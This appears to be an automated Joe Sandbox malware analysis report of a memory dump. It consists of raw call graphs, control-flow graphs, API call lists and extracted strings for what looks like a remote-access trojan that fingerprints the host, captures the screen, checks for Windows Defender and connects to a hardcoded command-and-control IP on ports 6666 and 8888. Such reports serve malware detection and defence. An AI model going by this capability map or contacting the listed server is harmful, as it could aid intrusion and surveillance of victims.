1cfb93967a4 32675->32673 32676 1cfb9396c80 RtlAllocateHeap _vsprintf_s_l _fltout2 32675->32676 32676->32675 32677 7ff6f6081fb0 32678 7ff6f6081fe3 32677->32678 32679 7ff6f6082b40 3 API calls 32678->32679 32682 7ff6f6082006 32678->32682 32679->32682 32680 7ff6f60838f0 3 API calls 32681 7ff6f60820ab 32680->32681 32682->32680 32389 1cfb96107a0 32432 1cfb9612fc4 32389->32432 32391 1cfb96107ec Sleep 32392 1cfb9610806 32391->32392 32393 1cfb9610835 32391->32393 32396 1cfb9611ef8 37 API calls 32392->32396 32394 1cfb9610843 GetLocalTime wsprintfW SetUnhandledExceptionFilter 32393->32394 32395 1cfb961083e 32393->32395 32398 1cfb96122d0 32 API calls 32394->32398 32397 1cfb9608be0 15 API calls 32395->32397 32399 1cfb961080f 32396->32399 32397->32394 32400 1cfb96108be CloseHandle 32398->32400 32401 1cfb96122d0 32 API calls 32399->32401 32402 1cfb9611ef8 37 API calls 32400->32402 32403 1cfb961082c CloseHandle 32401->32403 32404 1cfb96108d1 32402->32404 32403->32393 32405 1cfb96108de 32404->32405 32406 1cfb9603220 10 API calls 32404->32406 32407 1cfb9611ef8 37 API calls 32405->32407 32406->32405 32408 1cfb96108f0 32407->32408 32409 1cfb960b300 40 API calls 32408->32409 32414 1cfb9610902 32408->32414 32409->32414 32410 1cfb9610a29 EnumWindows 32411 1cfb9610a47 32410->32411 32410->32414 32412 1cfb9610a50 Sleep EnumWindows 32411->32412 32412->32412 32412->32414 32413 1cfb96120c4 31 API calls _FF_MSGBANNER 32413->32414 32414->32410 32414->32413 32415 1cfb9610aa7 Sleep 32414->32415 32416 1cfb9610af5 CreateEventA 32414->32416 32415->32414 32417 1cfb96120c4 _FF_MSGBANNER 31 API calls 32416->32417 32418 1cfb9610b36 RegOpenKeyExW 32417->32418 32419 1cfb9610b79 32418->32419 32420 1cfb960ee20 49 API calls 32419->32420 32421 1cfb9610b9c Sleep RegOpenKeyExW 32419->32421 32423 1cfb96067b0 164 API calls 32419->32423 32428 1cfb9610c2e 32419->32428 32420->32419 32421->32419 32422 1cfb9610bdf RegQueryValueExW 32421->32422 32422->32419 32423->32419 32424 1cfb96122d0 32 API calls 32424->32428 32425 
1cfb9610c79 Sleep 32425->32428 32426 1cfb9610d12 CloseHandle 32426->32414 32427 1cfb9610ce2 WaitForSingleObject CloseHandle 32427->32428 32428->32424 32428->32425 32428->32426 32428->32427 32429 1cfb9610d03 Sleep 32428->32429 32430 1cfb9610ca9 WaitForSingleObject CloseHandle 32428->32430 32431 1cfb9610cbe Sleep 32428->32431 32429->32426 32430->32431 32431->32426 32433 1cfb96139f0 32432->32433 32683 1cfb9603300 32684 1cfb960330f setsockopt CancelIo closesocket SetEvent 32683->32684 32685 1cfb960337a 32683->32685 32684->32685 32686 1cfb9603680 32693 1cfb96036b0 memcpy_s 32686->32693 32687 1cfb9603768 32689 1cfb96118a0 _fltout2 8 API calls 32687->32689 32688 1cfb9603700 select 32688->32687 32688->32693 32690 1cfb96037a0 32689->32690 32691 1cfb9603728 recv 32692 1cfb96037a9 32691->32692 32691->32693 32696 1cfb9603bd0 40 API calls memcpy_s 32692->32696 32693->32687 32693->32688 32693->32691 32695 1cfb9612178 31 API calls _errno 32693->32695 32695->32693 32696->32693 32697 1cfb9603380 ResetEvent timeGetTime socket 32698 1cfb960340f lstrlenW WideCharToMultiByte 32697->32698 32711 1cfb9603408 32697->32711 32699 1cfb9611878 32698->32699 32701 1cfb960345a lstrlenW WideCharToMultiByte gethostbyname 32699->32701 32700 1cfb96118a0 _fltout2 8 API calls 32702 1cfb960366b 32700->32702 32703 1cfb96034a1 32701->32703 32704 1cfb96034ae htons connect 32703->32704 32703->32711 32705 1cfb96034f4 setsockopt setsockopt setsockopt setsockopt 32704->32705 32704->32711 32706 1cfb96035f7 32705->32706 32707 1cfb96035a8 WSAIoctl 32705->32707 32712 1cfb96122d0 32706->32712 32707->32706 32710 1cfb96122d0 32 API calls 32710->32711 32711->32700 32713 1cfb9612310 32712->32713 32714 1cfb96122fb 32712->32714 32718 1cfb9616f6c __onexitinit 31 API calls 32713->32718 32734 1cfb9612178 31 API calls __doserrno 32714->32734 32716 1cfb9612300 32735 1cfb9614bc8 DecodePointer _invalid_parameter_noinfo 32716->32735 32720 1cfb9612324 32718->32720 32719 1cfb9603621 32719->32710 32728 1cfb961238c free 32720->32728 
32729 1cfb96168ec 32720->32729 32721 1cfb9611e00 free 31 API calls 32723 1cfb961239c 32721->32723 32723->32719 32736 1cfb96121b8 31 API calls 2 library calls 32723->32736 32725 1cfb96167b0 __doserrno 31 API calls 32727 1cfb9612340 CreateThread 32725->32727 32727->32719 32727->32728 32728->32721 32737 1cfb9616868 32729->32737 32731 1cfb96168f7 32732 1cfb9612331 32731->32732 32747 1cfb961469c 31 API calls 2 library calls 32731->32747 32732->32725 32734->32716 32735->32719 32736->32719 32738 1cfb9616878 __doserrno free 32737->32738 32739 1cfb96168d4 __doserrno 32738->32739 32740 1cfb9616f6c __onexitinit 30 API calls 32738->32740 32739->32731 32741 1cfb961689b __doserrno 32740->32741 32741->32739 32742 1cfb96168cf 32741->32742 32743 1cfb96168b9 32741->32743 32744 1cfb9611e00 free 30 API calls 32742->32744 32745 1cfb96167b0 __doserrno 30 API calls 32743->32745 32744->32739 32746 1cfb96168c0 GetCurrentThreadId 32745->32746 32746->32739 32748 1cfb93998fc 32750 1cfb9399914 32748->32750 32780 1cfb9399ec8 HeapCreate 32750->32780 32752 1cfb939996b 32795 1cfb939a30c RtlAllocateHeap _fltout2 _FF_MSGBANNER _set_error_mode 32752->32795 32756 1cfb9399984 32758 1cfb93999a0 malloc _RTC_Initialize 32756->32758 32759 1cfb9399996 32756->32759 32796 1cfb939a56c RtlAllocateHeap _FF_MSGBANNER _set_error_mode 32756->32796 32757 1cfb9399975 malloc 32782 1cfb939bbcc RtlAllocateHeap _errno __onexitinit 32757->32782 32783 1cfb939d3cc RtlAllocateHeap __onexitinit 32758->32783 32797 1cfb939a30c RtlAllocateHeap _fltout2 _FF_MSGBANNER _set_error_mode 32759->32797 32763 1cfb93999b5 32764 1cfb93999c3 32763->32764 32798 1cfb939a2b8 RtlAllocateHeap _lock _FF_MSGBANNER 32763->32798 32784 1cfb939d344 RtlAllocateHeap _getbuf __initmbctable 32764->32784 32767 1cfb93999ef 32785 1cfb939cf84 RtlAllocateHeap _fltout2 __onexitinit free _FF_MSGBANNER 32767->32785 32768 1cfb93999d5 32768->32767 32799 1cfb939a2b8 RtlAllocateHeap _lock _FF_MSGBANNER 32768->32799 32771 1cfb93999f4 32772 1cfb9399a02 32771->32772 
32800 1cfb939a2b8 RtlAllocateHeap _lock _FF_MSGBANNER 32771->32800 32786 1cfb939a040 RtlAllocateHeap _cinit _initterm_e 32772->32786 32775 1cfb9399a0c 32776 1cfb9399a17 32775->32776 32801 1cfb939a2b8 RtlAllocateHeap _lock _FF_MSGBANNER 32775->32801 32787 1cfb9398580 32776->32787 32779 1cfb9399a37 32781 1cfb9399959 32780->32781 32781->32752 32781->32757 32794 1cfb939a56c RtlAllocateHeap _FF_MSGBANNER _set_error_mode 32781->32794 32782->32756 32783->32763 32784->32768 32785->32771 32786->32775 32788 1cfb9398591 PostThreadMessageA 32787->32788 32790 1cfb93985be 32788->32790 32802 1cfb93973d0 32790->32802 32792 1cfb93985c3 CreateThread 32793 1cfb93985f7 32792->32793 32793->32779 32794->32752 32795->32757 32796->32759 32797->32758 32805 1cfb93973e4 _vsprintf_s_l _wcsrev 32802->32805 32806 1cfb9397dbb _vsprintf_s_l 32802->32806 32803 1cfb9397d4d RegOpenKeyExW 32804 1cfb9397d8b RegQueryValueExW 32803->32804 32803->32806 32804->32806 32805->32803 32806->32792 32434 1cfb9393310 32435 1cfb939337a 32434->32435 32436 1cfb939331f setsockopt 32434->32436 32437 1cfb9393360 closesocket 32436->32437 32437->32435 32438 1cfb9393c10 32439 1cfb9393c26 SleepEx 32438->32439 32440 1cfb9393c46 32439->32440 32441 1cfb9393390 32442 1cfb93933c7 socket 32441->32442 32444 1cfb9393418 _fltout2 32442->32444 32445 1cfb939341f 32442->32445 32446 1cfb9393499 gethostbyname 32445->32446 32447 1cfb93934b1 32446->32447 32447->32444 32448 1cfb93934ce connect 32447->32448 32448->32444 32449 1cfb9393504 setsockopt setsockopt setsockopt setsockopt 32448->32449 32450 1cfb93935b8 WSAIoctl 32449->32450 32451 1cfb9393607 32449->32451 32450->32451 32452 1cfb93994dc 2 API calls 32451->32452 32453 1cfb9393631 32452->32453 32454 1cfb93994dc 2 API calls 32453->32454 32454->32444 32455 1cfb9393690 32459 1cfb93936c0 __initmbctable 32455->32459 32456 1cfb9393710 select 32457 1cfb9393778 _fltout2 32456->32457 32456->32459 32458 1cfb9393738 recv 32458->32459 32459->32456 32459->32457 32459->32458 32461 1cfb9399384 
RtlAllocateHeap _errno 32459->32461 32462 1cfb9393c80 VirtualAlloc VirtualFree VirtualAlloc VirtualFree __initmbctable 32459->32462 32461->32459 32462->32459

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 1cfb96067b0-1cfb960687d call 1cfb9611ef8 call 1cfb9615b40 * 2 gethostname gethostbyname 7 1cfb9606921-1cfb9606a6b MultiByteToWideChar * 2 GetLastInputInfo call 1cfb9626150 wsprintfW MultiByteToWideChar * 2 call 1cfb9608a70 GetSystemInfo wsprintfW call 1cfb9608180 call 1cfb9608440 GetForegroundWindow 0->7 8 1cfb9606883-1cfb96068cd inet_ntoa call 1cfb9612e20 * 2 0->8 25 1cfb9606a83-1cfb9606ac0 lstrlenW call 1cfb9608310 7->25 26 1cfb9606a6d-1cfb9606a7d GetWindowTextW 7->26 8->7 18 1cfb96068cf 8->18 20 1cfb96068d2-1cfb960691f inet_ntoa call 1cfb9612e20 * 2 18->20 20->7 31 1cfb9606ac2-1cfb9606ad5 call 1cfb96120c4 25->31 32 1cfb9606ada-1cfb9606b18 call 1cfb96120c4 lstrlenW call 1cfb9608310 25->32 26->25 31->32 38 1cfb9606b32-1cfb9606b72 call 1cfb9626148 call 1cfb96261e8 32->38 39 1cfb9606b1a-1cfb9606b2d call 1cfb96120c4 32->39 45 1cfb9606b74-1cfb9606b76 GetNativeSystemInfo 38->45 46 1cfb9606b78 GetSystemInfo 38->46 39->38 47 1cfb9606b7e-1cfb9606b8b 45->47 46->47 48 1cfb9606b9b 47->48 49 1cfb9606b8d-1cfb9606b95 47->49 51 1cfb9606ba0-1cfb9606bfe wsprintfW call 1cfb9607f70 call 1cfb9626280 call 1cfb9609a50 call 1cfb9607a90 48->51 49->48 50 1cfb9606b97-1cfb9606b99 49->50 50->51 60 1cfb9606c00 51->60 61 1cfb9606c07-1cfb9606d12 call 1cfb96120c4 call 1cfb9607860 call 1cfb9607510 call 1cfb9612534 call 1cfb9626150 call 1cfb9612e9c call 1cfb9612dd8 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 51->61 60->61 76 1cfb9606d1f 61->76 77 1cfb9606d14-1cfb9606d1d 61->77 78 1cfb9606d28-1cfb9606d95 call 1cfb9606da0 call 1cfb9611880 call 1cfb96118a0 76->78 77->78
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Info$ByteCharMultiSystemWidewsprintf$CountCurrentTickWindow_errnoinet_ntoalstrlen$AddressDirectoryForegroundHandleInputLastLocaleModuleNativeProcProcessProfileText_invalid_parameter_noinfo_localtime64gethostbynamegethostnamemalloc
                          • String ID: %d min$1.0$2024. 6.19$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X64$X64 %s$kernel32.dll$x64$x86
                          • API String ID: 1661628823-2610823962
                          • Opcode ID: 0597a9a8bc57398b293fbe0f732a79aa948228ee52a9d6ae8b0ebe17f385299e
                          • Instruction ID: 309093f93e4ef286cd73267993ec77eae4492e053d3fd233417c329175dcd11e
                          • Opcode Fuzzy Hash: 0597a9a8bc57398b293fbe0f732a79aa948228ee52a9d6ae8b0ebe17f385299e
                          • Instruction Fuzzy Hash: 41F16C32240AC696FB18DF60E880BDD7773F794744F40412ADA4A57AA5DF38DB6AC740

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 86 1cfb96107a0-1cfb9610804 call 1cfb9612fc4 Sleep 89 1cfb9610806-1cfb961082f call 1cfb9611ef8 call 1cfb96122d0 CloseHandle 86->89 90 1cfb9610835-1cfb961083c 86->90 89->90 91 1cfb9610843-1cfb96108d4 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 1cfb96122d0 CloseHandle call 1cfb9611ef8 90->91 92 1cfb961083e call 1cfb9608be0 90->92 102 1cfb96108e3 91->102 103 1cfb96108d6-1cfb96108e1 call 1cfb9603220 91->103 92->91 105 1cfb96108e6-1cfb96108f8 call 1cfb9611ef8 102->105 103->105 109 1cfb9610907 105->109 110 1cfb96108fa-1cfb96108fd call 1cfb960b300 105->110 112 1cfb961090a-1cfb961090f 109->112 113 1cfb9610902-1cfb9610905 110->113 114 1cfb9610910-1cfb9610928 call 1cfb9603200 112->114 113->112 117 1cfb9610957-1cfb961097b call 1cfb96120c4 * 2 114->117 118 1cfb961092a-1cfb9610955 call 1cfb96120c4 * 2 114->118 127 1cfb9610982-1cfb96109aa 117->127 118->127 128 1cfb96109f6-1cfb9610a00 127->128 129 1cfb96109ac-1cfb96109ef call 1cfb9603200 call 1cfb96120c4 * 2 127->129 131 1cfb9610a02-1cfb9610a07 128->131 132 1cfb9610a0e-1cfb9610a27 128->132 129->128 131->132 134 1cfb9610a79-1cfb9610aa5 call 1cfb9612fc4 132->134 135 1cfb9610a29-1cfb9610a45 EnumWindows 132->135 146 1cfb9610ab7-1cfb9610b77 call 1cfb9612fc4 CreateEventA call 1cfb96120c4 RegOpenKeyExW 134->146 147 1cfb9610aa7-1cfb9610ab2 Sleep 134->147 135->134 139 1cfb9610a47 135->139 140 1cfb9610a50-1cfb9610a77 Sleep EnumWindows 139->140 140->134 140->140 153 1cfb9610b89 146->153 154 1cfb9610b79-1cfb9610b83 call 1cfb960ee20 146->154 147->114 155 1cfb9610b90-1cfb9610b9a 153->155 157 1cfb9610b88 154->157 158 1cfb9610c16-1cfb9610c24 call 1cfb96067b0 155->158 159 1cfb9610b9c-1cfb9610bdd Sleep RegOpenKeyExW 155->159 157->153 164 1cfb9610c29-1cfb9610c2c 158->164 160 1cfb9610bdf-1cfb9610c02 RegQueryValueExW 159->160 161 1cfb9610c08-1cfb9610c0d 159->161 160->161 161->155 163 1cfb9610c0f 161->163 163->158 165 1cfb9610c40-1cfb9610c47 164->165 166 1cfb9610c2e-1cfb9610c3b 164->166 167 
1cfb9610c49-1cfb9610c68 call 1cfb96122d0 165->167 168 1cfb9610c6b-1cfb9610c6e 165->168 175 1cfb9610d12-1cfb9610d28 CloseHandle 166->175 167->168 169 1cfb9610c70-1cfb9610c77 168->169 173 1cfb9610c79-1cfb9610c89 Sleep 169->173 174 1cfb9610ccc-1cfb9610ce0 169->174 173->169 176 1cfb9610c8b-1cfb9610c92 173->176 179 1cfb9610ce2-1cfb9610cf1 WaitForSingleObject CloseHandle 174->179 180 1cfb9610cf7-1cfb9610d11 call 1cfb9612fc4 Sleep 174->180 175->114 176->174 177 1cfb9610c94-1cfb9610ca7 176->177 184 1cfb9610ca9-1cfb9610cb8 WaitForSingleObject CloseHandle 177->184 185 1cfb9610cbe-1cfb9610cca Sleep 177->185 179->180 180->175 184->185 185->175
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$CloseHandle$_errno$CreateEnumObjectOpenSingleWaitWindows_invalid_parameter_noinfo$ErrorEventExceptionFilterLastLocalQueryThreadTimeUnhandledValue_getptdfreemallocwsprintf
                          • String ID: %4d.%2d.%2d-%2d:%2d:%2d$127.0.0.1$206.238.115.146$206.238.115.146$206.238.115.146$6666$8888$Console$Console\1$IpDatespecial
                          • API String ID: 3428909306-2523648427
                          • Opcode ID: e7f111ba5dc29d1d22144977cf958d959f161eb9f5cb80e62a8ccba1b0c60566
                          • Instruction ID: 4db1bbfdc96b82c0f8ac123ee19958495282036af8265f6dfec0f1a650894106
                          • Opcode Fuzzy Hash: e7f111ba5dc29d1d22144977cf958d959f161eb9f5cb80e62a8ccba1b0c60566
                          • Instruction Fuzzy Hash: E5F15831688AD286FB149F25E880BD977B3F795784F40513EDA4A436A5DF38CE4ACB00

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 186 1cfb960dd20-1cfb960ddca GetDesktopWindow GetDC CreateCompatibleDC GetDC GetDeviceCaps * 2 ReleaseDC 187 1cfb960ddd9-1cfb960ddf2 GetSystemMetrics 186->187 188 1cfb960ddcc-1cfb960ddd4 186->188 190 1cfb960de42-1cfb960de5d GetSystemMetrics 187->190 191 1cfb960ddf4-1cfb960de40 GetSystemMetrics 187->191 189 1cfb960de62-1cfb960e051 GetSystemMetrics * 2 CreateCompatibleBitmap SelectObject SetStretchBltMode GetSystemMetrics * 2 StretchBlt call 1cfb9611878 call 1cfb9615b40 GetDIBits call 1cfb9611878 call 1cfb9615b40 call 1cfb96118d0 call 1cfb9611ef8 188->189 204 1cfb960e053-1cfb960e066 189->204 205 1cfb960e068 189->205 190->189 191->189 206 1cfb960e06a-1cfb960e077 call 1cfb960e1c0 204->206 205->206 208 1cfb960e07c-1cfb960e07e 206->208 209 1cfb960e080-1cfb960e0aa DeleteObject * 2 ReleaseDC call 1cfb96123c4 208->209 210 1cfb960e0ea-1cfb960e10e call 1cfb9611878 208->210 215 1cfb960e0b4-1cfb960e0b7 209->215 216 1cfb960e0ac-1cfb960e0af call 1cfb96123c4 209->216 217 1cfb960e110-1cfb960e113 210->217 218 1cfb960e115 210->218 221 1cfb960e0e3-1cfb960e0e5 215->221 222 1cfb960e0b9-1cfb960e0be 215->222 216->215 219 1cfb960e118-1cfb960e14d call 1cfb96118d0 DeleteObject * 2 ReleaseDC call 1cfb96123c4 217->219 218->219 234 1cfb960e14f-1cfb960e152 call 1cfb96123c4 219->234 235 1cfb960e157-1cfb960e15c 219->235 226 1cfb960e184-1cfb960e1b2 call 1cfb96118a0 221->226 224 1cfb960e0c0-1cfb960e0c3 call 1cfb9611880 222->224 225 1cfb960e0c8-1cfb960e0de call 1cfb9611880 222->225 224->225 225->221 234->235 237 1cfb960e166-1cfb960e181 call 1cfb9611880 235->237 238 1cfb960e15e-1cfb960e161 call 1cfb9611880 235->238 237->226 238->237
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch$BitmapBitsDesktopModeSelectWindowmalloc
                          • String ID: $gfff$gfff
                          • API String ID: 1524144516-4202476792
                          • Opcode ID: 9a10de1b3758c51586f0cda8e42a005b2d9936903bf318cf6b77adf13835b416
                          • Instruction ID: 2994d5536e0a6d89f695ccd8f09d9c4345fe604353f95f7b4c9a77764b569088
                          • Opcode Fuzzy Hash: 9a10de1b3758c51586f0cda8e42a005b2d9936903bf318cf6b77adf13835b416
                          • Instruction Fuzzy Hash: A3D1B032710B9186F715AB71E454B9D73B3FB59B88F01823ADE0A67798EF38C9568340
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: OpenQueryValue_wcsrev
                          • String ID: 1$|$|$|$|$|$|$|$|$|$|$|$|$|$|
                          • API String ID: 2336627112-483243098
                          • Opcode ID: e7c24950faba3f9ac85f5f069f5f95afb0107786a1c82c81ace9b637109b25c1
                          • Instruction ID: b9ceb4c2870b1af13fd6217388f93164b9ffedb9a8898c40617e7ecb3b27d834
                          • Opcode Fuzzy Hash: e7c24950faba3f9ac85f5f069f5f95afb0107786a1c82c81ace9b637109b25c1
                          • Instruction Fuzzy Hash: 6F92F7306A49898AFB2D6F14D985BF973AAFB51305FAC853DC487C20E2DF74C9478681

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWidelstrlen$EventResetTimeconnectgethostbynamehtonssockettime
                          • String ID: 0u
                          • API String ID: 950253168-3203441087
                          • Opcode ID: 0b0d78ca37e5d5ffe8402b7fe09c2a3ec7c65584014e325bd1671e59c11e9872
                          • Instruction ID: 4022e190c70c03b14471ad94b9f9ef58bfbb305f64adb940e2047e5496de9b0e
                          • Opcode Fuzzy Hash: 0b0d78ca37e5d5ffe8402b7fe09c2a3ec7c65584014e325bd1671e59c11e9872
                          • Instruction Fuzzy Hash: 35812C72204BC187E760DF61F48079AB7B6F788B94F50412AEA8A57B64DF3CD5468B04

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseCreateProcess32$FirstHandleInstanceNextOpenQuerySnapshotToolhelp32Valuelstrlenwsprintf
                          • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                          • API String ID: 2719888535-1583895642
                          • Opcode ID: 5798e1544e650f95b40f9061c22e2bd83b7a927371cc76c98018ac4bb4a914d0
                          • Instruction ID: 620889b4c088d9526dbe7ffdda88db386f5dd7808f3903edf2e6aa99fbc7fdba
                          • Opcode Fuzzy Hash: 5798e1544e650f95b40f9061c22e2bd83b7a927371cc76c98018ac4bb4a914d0
                          • Instruction Fuzzy Hash: B2915D32700B9586FB14DF66E890BDD77B2F788B88F50512ADE4957A68DF38CA06C700

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 835 1cfb96188e0-1cfb9618928 call 1cfb961b128 call 1cfb96196c4 call 1cfb961967c 842 1cfb9618d39-1cfb9618d4d call 1cfb9614b24 835->842 843 1cfb961892e-1cfb961893d call 1cfb961961c 835->843 848 1cfb9618d4e-1cfb9618d5d 842->848 849 1cfb9618943-1cfb9618952 call 1cfb961964c 843->849 850 1cfb9618d25-1cfb9618d34 call 1cfb9614b24 843->850 854 1cfb9618d11-1cfb9618d20 call 1cfb9614b24 849->854 855 1cfb9618958-1cfb961898f call 1cfb961d7f0 call 1cfb961d9e4 849->855 850->842 854->850 861 1cfb9618a26-1cfb9618a30 855->861 862 1cfb9618995-1cfb9618998 855->862 864 1cfb9618a32-1cfb9618a37 call 1cfb9611e00 861->864 865 1cfb9618a3e-1cfb9618a45 call 1cfb9626380 861->865 862->861 863 1cfb961899e-1cfb96189a8 862->863 868 1cfb96189aa-1cfb96189b7 call 1cfb96140d0 863->868 869 1cfb96189ce-1cfb96189e9 call 1cfb9614200 call 1cfb9616eec 863->869 864->865 872 1cfb9618a4b-1cfb9618a4e 865->872 876 1cfb9618b75 868->876 882 1cfb96189bd-1cfb96189c7 868->882 869->876 890 1cfb96189ef-1cfb9618a0c call 1cfb9614200 call 1cfb9614180 869->890 875 1cfb9618a54-1cfb9618a7c 872->875 872->876 880 1cfb9618a8c-1cfb9618a94 875->880 881 1cfb9618a7e-1cfb9618a85 875->881 878 1cfb9618b7a-1cfb9618bb0 call 1cfb96196bc call 1cfb96196ac call 1cfb96196b4 call 1cfb961b028 876->878 878->848 912 1cfb9618bb6-1cfb9618bce call 1cfb961cc24 878->912 886 1cfb9618a96-1cfb9618a9e 880->886 887 1cfb9618ab9-1cfb9618ac1 880->887 881->880 882->869 883 1cfb96189c9 call 1cfb9611e00 882->883 883->869 886->887 891 1cfb9618aa0-1cfb9618ab7 886->891 892 1cfb9618ac9-1cfb9618b03 WideCharToMultiByte 887->892 890->878 909 1cfb9618a12-1cfb9618a21 call 1cfb9614b24 890->909 891->892 895 1cfb9618b05-1cfb9618b0d 892->895 896 1cfb9618b19-1cfb9618b1d 892->896 895->896 899 1cfb9618b0f-1cfb9618b17 895->899 900 1cfb9618b20-1cfb9618b56 WideCharToMultiByte 896->900 899->900 901 1cfb9618b58-1cfb9618b60 900->901 902 1cfb9618b6d-1cfb9618b72 900->902 901->902 905 1cfb9618b62-1cfb9618b6b 901->905 902->876 905->876 909->861 
915 1cfb9618bd4-1cfb9618bda 912->915 916 1cfb9618cfc-1cfb9618d10 call 1cfb9614b24 912->916 917 1cfb9618be3-1cfb9618bff call 1cfb961d9d8 915->917 918 1cfb9618bdc-1cfb9618be0 915->918 916->854 923 1cfb9618c02-1cfb9618c06 917->923 918->917 924 1cfb9618cf4-1cfb9618cf7 923->924 925 1cfb9618c0c-1cfb9618c0e 923->925 924->923 926 1cfb9618c10-1cfb9618c13 925->926 927 1cfb9618c19-1cfb9618c1c 925->927 926->924 926->927 928 1cfb9618c82-1cfb9618c85 927->928 929 1cfb9618c1e-1cfb9618c3f call 1cfb961d9d8 927->929 930 1cfb9618c92-1cfb9618c9e 928->930 931 1cfb9618c87-1cfb9618c8a 928->931 938 1cfb9618c49-1cfb9618c4d 929->938 933 1cfb9618ca0-1cfb9618cb7 call 1cfb961cc24 930->933 934 1cfb9618cce-1cfb9618cd3 930->934 931->930 936 1cfb9618cd6-1cfb9618cf2 call 1cfb96196bc call 1cfb96196ac 933->936 945 1cfb9618cb9-1cfb9618ccd call 1cfb9614b24 933->945 934->936 936->848 941 1cfb9618c4f-1cfb9618c52 938->941 942 1cfb9618c41-1cfb9618c44 938->942 941->928 943 1cfb9618c54-1cfb9618c72 call 1cfb961d9d8 941->943 942->941 946 1cfb9618c46 942->946 953 1cfb9618c7c-1cfb9618c80 943->953 945->934 946->938 953->928 954 1cfb9618c74-1cfb9618c77 953->954 954->928 955 1cfb9618c79 954->955 955->953
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_get_daylight_invalid_parameter_noinfo$ByteCharMultiWidefree$ErrorFreeHeapInformationLastTimeZone___lc_codepage_func__wtomb_environ_amsg_exit_getptd_lock
                          • String ID: Eastern Standard Time$Eastern Summer Time
                          • API String ID: 2532449802-239921721
                          • Opcode ID: 85d2046c202578092d9edaa575532717112bf84546d8c53ba0c1048ebffc475c
                          • Instruction ID: 93fc491af668b608a0d8311810acec24284f88d6fe3da0fbf618f48145ec1890
                          • Opcode Fuzzy Hash: 85d2046c202578092d9edaa575532717112bf84546d8c53ba0c1048ebffc475c
                          • Instruction Fuzzy Hash: 4CC1C1722842E28AFB20DF25E451BDA77B7B784780F40613D9A89537A6DB38CE53C700

                          Control-flow Graph

